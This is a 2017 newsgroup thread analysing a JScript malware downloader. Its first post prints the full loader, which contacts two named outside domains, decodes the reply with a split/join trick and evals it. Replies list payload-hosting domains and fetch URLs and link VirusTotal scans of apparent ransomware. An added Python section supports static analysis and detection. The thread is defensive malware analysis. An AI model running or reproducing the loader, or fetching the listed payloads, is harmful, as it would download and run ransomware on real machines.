
Looks harmless enough


Virus Guy

Feb 11, 2017, 8:25:15 PM
Looks harmless enough:

var z1 = "Msxml2.XMLHTTP";
var m = "rRJ-9BCo_j7r5qhkiCr8-rk5YjGOxEz6fHKRS4iRecpYZvsAZ96JLAqO4wEAjAAuimMx4pdoRfco9Eh8xivqlG-3SIRDdjM-KQ0";  // marker, also sent as the query string
var x = new Array("sobrspot.com","romiecoston.com");
var z4 = "a";
for (var i=0; i<x.length; i++) {
  var e = new ActiveXObject(z1);
  try {
    e.open("GET", "http://"+x[i]+"/counter/?"+m, false);
    e.send();
    if (e.status == 200) {
      var z3 = e.responseText;
      var z3 = z3.split(m);      // cut the marker out of the response...
      var z3 = z3.join(z4);      // ...and put "a" in its place
      eval(z3);                  // run whatever that yields
      break;
    };
  } catch(e) { };
};

What's it do?

Ant

Feb 12, 2017, 6:53:54 AM
"Virus Guy" wrote:
> What's it do?

Runs scripts at sobrspot.com and romiecoston.com which try to download
and run two executables from one of these domains:

azlivesound.com
bathsaltsboutique.com
haroldsowls.com
natureprintsfloors.com
netmix360.com
ocassmarket.com
revitconstruction.ca
wspace.whitespaceco.com

The first is about 303 KB and the second about 360 KB in size.

No idea what they are but ransomware is very common these days.

I don't have time but if someone wants to play with them:

hxxp://[domain]//counter/?1
hxxp://[domain]//counter/?2
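An added analyst-side example (not code from the thread or from either poster): it pulls the marker, join string and domain list out of the posted loader statically, reproduces the split/join decode on a captured response so the second stage can be read as text without eval, and exposes the loader's three traits as triage indicators. The helper names are my own.

```python
import re

# Constructed copy of the loader as posted in the thread; held as data for
# static analysis only and never executed.
LOADER = '''var z1 = "Msxml2.XMLHTTP"; var m =
"rRJ-9BCo_j7r5qhkiCr8-rk5YjGOxEz6fHKRS4iRecpYZvsAZ96JLAqO4wEAjAAuimMx4pdoRfco9Eh8xivqlG-3SIRDdjM-KQ0";
var x = new Array("sobrspot.com","romiecoston.com"); var z4 = "a"; for
(var i=0; i<x.length; i++) { var e = new ActiveXObject(z1); try {
e.open("GET", "http://"+x[i]+"/counter/?"+m, false); e.send(); if
(e.status == 200) { var z3 = e.responseText; var z3 = z3.split(m); var
z3 = z3.join(z4); eval(z3); break; }; } catch(e) { }; };'''

def _string_var(script, name):
    """Literal assigned by `var <name> = "..."`, or None if there is none."""
    m = re.search(r'var\s+' + re.escape(name) + r'\s*=\s*"([^"]*)"', script)
    return m.group(1) if m else None

def extract_config(script):
    """Recover marker, join string and contact domains without running the script.
    The loader does responseText.split(<marker>).join(<joiner>), so the variable
    names passed to split() and join() are resolved to their string literals."""
    split_var = re.search(r'\.split\((\w+)\)', script).group(1)
    join_var = re.search(r'\.join\((\w+)\)', script).group(1)
    array = re.search(r'new Array\(([^)]*)\)', script)
    domains = re.findall(r'"([^"]+)"', array.group(1)) if array else []
    return {"marker": _string_var(script, split_var),
            "joiner": _string_var(script, join_var),
            "domains": domains}

def decode_response(response_text, marker, joiner):
    """Reproduce the split/join step on a captured response, without eval.
    The server hides the real script by writing the long marker wherever the
    joiner ("a" here) belongs; undoing that is a plain substitution."""
    if not marker:  # JS split("") would split per character; refuse instead
        raise ValueError("empty marker")
    return joiner.join(response_text.split(marker))

def indicators(script):
    """Cheap static signals for this downloader shape, usable in a triage rule."""
    return {
        "msxml_activex": "Msxml2.XMLHTTP" in script and "ActiveXObject(" in script,
        "eval_of_response": re.search(r'responseText[\s\S]*?eval\(', script) is not None,
        "split_join_decode": re.search(r'\.split\(\w+\)[\s\S]*?\.join\(\w+\)', script) is not None,
    }
```

A response body captured in a sandbox can be passed to decode_response() with the recovered marker and joiner to read the second stage as plain text.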


Virus Guy

Feb 12, 2017, 9:06:26 AM
In other words:

http://[domain]/counter/?1 (or /?2)

Turns out that this also works:

http://[domain]/counter/?3

Gives you a 44 kb file. And it doesn't matter which domain you try -
you'll always get the same 303 or 357 or 44 kb file. /?4 doesn't give
you anything.

Here's a scan of the 44 kb file:

https://www.virustotal.com/en/file/4ed142ac450d0ea86e0e31c46b1ca928bde991a7432dd6a0c2c3d79833ccac95/analysis/1486907362/

This is surprising:

First submission 2010-07-03 09:04:07 UTC ( 6 years, 7 months ago )

Here's the scan for the 303 kb file:

https://www.virustotal.com/en/file/ea103416ceaaea9273470e5c9a2b579b13c7fdd60b7f6a0a47296c838c842ed2/analysis/1486907755/

This was the first submission for that file. Detection rate 17/58. I'm
seeing Locky being thrown around here. I think Trend is calling it
KOVTER (?).

Here's the scan for the 357 kb file:

https://www.virustotal.com/en/file/2c44eff2971cee7400f508f5683d14b5613096db568ff4b1835fcfc86c60ad62/analysis/1486907933/

And this was also the first time it was seen. Detection rate 9/57.

The detections of this file don't seem to give it a name - the
detections just seem to be generic "this looks suspicious so I'll flag
it". Unless GenKryptik and WisdomEyes are actual malware names.

Ant

Feb 12, 2017, 2:42:48 PM
"Virus Guy" wrote:
> Turns out that this also works:
> http://[domain]/counter/?3
> Gives you a 44 kb file.
[...]
> This is surprising:
> First submission 2010-07-03 09:04:07 UTC ( 6 years, 7 months ago )

Indications are that this is not malware and does what it says on the
tin: "PHP Script Interpreter" and "Copyright (c) 1997-2008 The PHP
Group". It imports functions from php4ts.dll, a PHP library not found
by default on Windows machines. There are no strange or obfuscated
sections. It's a command-line program and even has usage help.


FromTheRafters

Feb 13, 2017, 11:30:56 AM
Ant has brought this to us:
I got a PNG file with an MZ header.

VT already had it.

https://www.virustotal.com/en/file/c06bf06b12b93473537d29b8f3d6f84a29e689bbd5d68d61f474c7040762becd/analysis/

Shadow

Feb 14, 2017, 8:27:45 AM
I got two *.png files.
Wondering what NEW vulnerability they'd use to execute. Did
nothing in my Firefox 17 .............
[]'s
--
Don't be evil - Google 2004
We have a new policy - Google 2012

FromTheRafters

Feb 15, 2017, 1:44:37 PM
Shadow presented the following explanation:
One of the AV detections used a CVE designation and I followed that
lead. Today I can't remember the vulnerability but IIRC it was from
2012.

David B.

Feb 15, 2017, 6:13:34 PM
Have you been poorly, FTR?

--
"Do something wonderful, people may imitate it." (Albert Schweitzer)